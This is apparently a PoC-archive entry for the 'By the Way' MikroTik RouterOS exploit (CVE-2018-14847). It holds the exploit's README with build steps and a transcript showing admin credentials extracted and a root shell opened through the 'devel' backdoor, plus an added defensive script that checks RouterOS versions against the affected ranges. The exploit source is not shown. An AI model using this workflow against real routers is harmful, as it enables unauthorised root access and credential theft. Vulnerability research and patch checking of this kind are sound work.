PoC details: 4fa0052e031b42470283b44b46c74273fa899ae3

Related vulnerability
Title: Winbox for MikroTik RouterOS security vulnerability (CVE-2018-14847)
Description: MikroTik RouterOS is a router operating system. Winbox for MikroTik RouterOS is an application for managing MikroTik RouterOS systems. A security vulnerability exists in Winbox for MikroTik RouterOS 6.42 and earlier. A remote attacker can exploit it via a modified request to bypass authentication and read arbitrary files.
Introduction
# By the Way

By the Way is an exploit that enables a root shell on Mikrotik devices running RouterOS versions:

* Longterm: 6.30.1 - 6.40.7
* Stable: 6.29 - 6.42.0
* Beta: 6.29rc1 - 6.43rc3

The exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an "option" package to enable the developer backdoor. Post-exploitation, the attacker can connect to Telnet or SSH using the root user "devel" with the admin's password.

Mikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe it's been publicly disclosed that the attack can be leveraged to write files. You can find Mikrotik's advisory here:

* https://blog.mikrotik.com/security/winbox-vulnerability.html

Note that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.
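The three version ranges above are the practical input for a defender: a device whose RouterOS build falls inside them needs the vendor fix before anything else. The following is an added, defender-side example for patch verification and asset inventory; it is not part of the By the Way PoC. The ranges are copied from the list above, the version-string format follows the `cat /rw/logs/VERSION` output in the usage transcript below, and the function names and the sample inventory are this example's own constructions.

```python
"""Check a RouterOS version string against the affected ranges listed above.

Added, defender-side example (patch verification / asset inventory); it is
not part of the By the Way PoC. The ranges are copied from the README's
list; the function names and the sample version strings are this example's
own constructions.
"""
import re
from typing import List, Optional, Tuple

# (channel, lowest affected build, highest affected build), from the README
AFFECTED_RANGES = (
    ("longterm", "6.30.1", "6.40.7"),
    ("stable", "6.29", "6.42.0"),
    ("beta", "6.29rc1", "6.43rc3"),
)

# Accepts '6.38.4', 'v6.38.4', '6.29', '6.43rc3'; trailing text such as the
# build date printed by /rw/logs/VERSION is dropped before matching.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)(?:\.(\d+))?(?:rc(\d+))?$")

VersionKey = Tuple[int, int, int, int, int]


def parse_version(text: str) -> VersionKey:
    """Return (major, minor, patch, is_final, rc_number) for ordering.

    A release candidate sorts before the final build of the same number:
    6.43rc3 -> (6, 43, 0, 0, 3) and 6.43 -> (6, 43, 0, 1, 0).
    """
    token = text.strip().split()[0] if text.strip() else ""
    m = _VERSION_RE.match(token)
    if not m:
        raise ValueError(f"unrecognised RouterOS version string: {text!r}")
    major, minor, patch, rc = m.groups()
    if rc is None:
        return (int(major), int(minor), int(patch or 0), 1, 0)
    return (int(major), int(minor), int(patch or 0), 0, int(rc))


def affected_channels(version: str, channel: Optional[str] = None) -> List[str]:
    """Channels whose affected range contains `version`.

    RouterOS numbers are shared across release trains, so a bare number can
    sit in more than one range (6.38.4 is inside both the longterm and the
    stable range). Pass `channel` when you know which train the device runs;
    without it, 'rcN' builds are checked against the beta range only and
    final builds against stable and longterm only.
    """
    key = parse_version(version)
    if channel is None:
        candidates = {"beta"} if key[3] == 0 else {"stable", "longterm"}
    else:
        candidates = {channel.lower()}
    return [
        name
        for name, low, high in AFFECTED_RANGES
        if name in candidates and parse_version(low) <= key <= parse_version(high)
    ]


def is_affected(version: str, channel: Optional[str] = None) -> bool:
    """True when the build falls inside at least one affected range."""
    return bool(affected_channels(version, channel))


if __name__ == "__main__":
    # Constructed sample inventory; the first entry is the VERSION line
    # shown in the usage transcript of this README.
    inventory = [
        ("v6.38.4 Mar/08/2017 09:26:17", None),
        ("6.42.1", "stable"),      # just past the stable range's upper bound
        ("6.40.8", None),          # ambiguous without knowing the channel
        ("6.40.8", "longterm"),    # past the longterm range's upper bound
        ("6.43rc3", None),
        ("6.43rc4", None),
    ]
    for ver, chan in inventory:
        hits = affected_channels(ver, chan)
        state = "AFFECTED via " + ", ".join(hits) if hits else "not in an affected range"
        print(f"{ver:32} channel={chan or 'unknown':9} {state}")
```

The channel argument matters: 6.40.8 is outside the longterm range but inside the stable one, so a bare number is reported as affected until the operator states which train the device tracks. Feed the script the first token of `/rw/logs/VERSION` (or the version shown in the admin console) for each device and treat any hit as a device still lacking the vendor fix.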

## Dependencies
This PoC relies on:

* Boost 1.66
* pthread
* cmake

## Build Instructions

```sh
mkdir build
cd build
cmake ..
make
```

## Usage Example

```sh
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 
Login failed, incorrect username or password

Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251

   ╔╗ ┬ ┬  ┌┬┐┬ ┬┌─┐  ╦ ╦┌─┐┬ ┬
   ╠╩╗└┬┘   │ ├─┤├┤   ║║║├─┤└┬┘
   ╚═╝ ┴    ┴ ┴ ┴└─┘  ╚╩╝┴ ┴ ┴ 

[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials 
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 


BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
```
File snapshot

[4.0K] /data/pocs/4fa0052e031b42470283b44b46c74273fa899ae3
├── [ 777] CMakeLists.txt
├── [4.0K] common
│   ├── [7.8K] md5.cpp
│   ├── [1.7K] session.cpp
│   ├── [ 53K] winbox_message.cpp
│   └── [9.6K] winbox_session.cpp
├── [2.3K] README.md
└── [4.0K] src
    └── [ 14K] main.cpp

2 directories, 7 files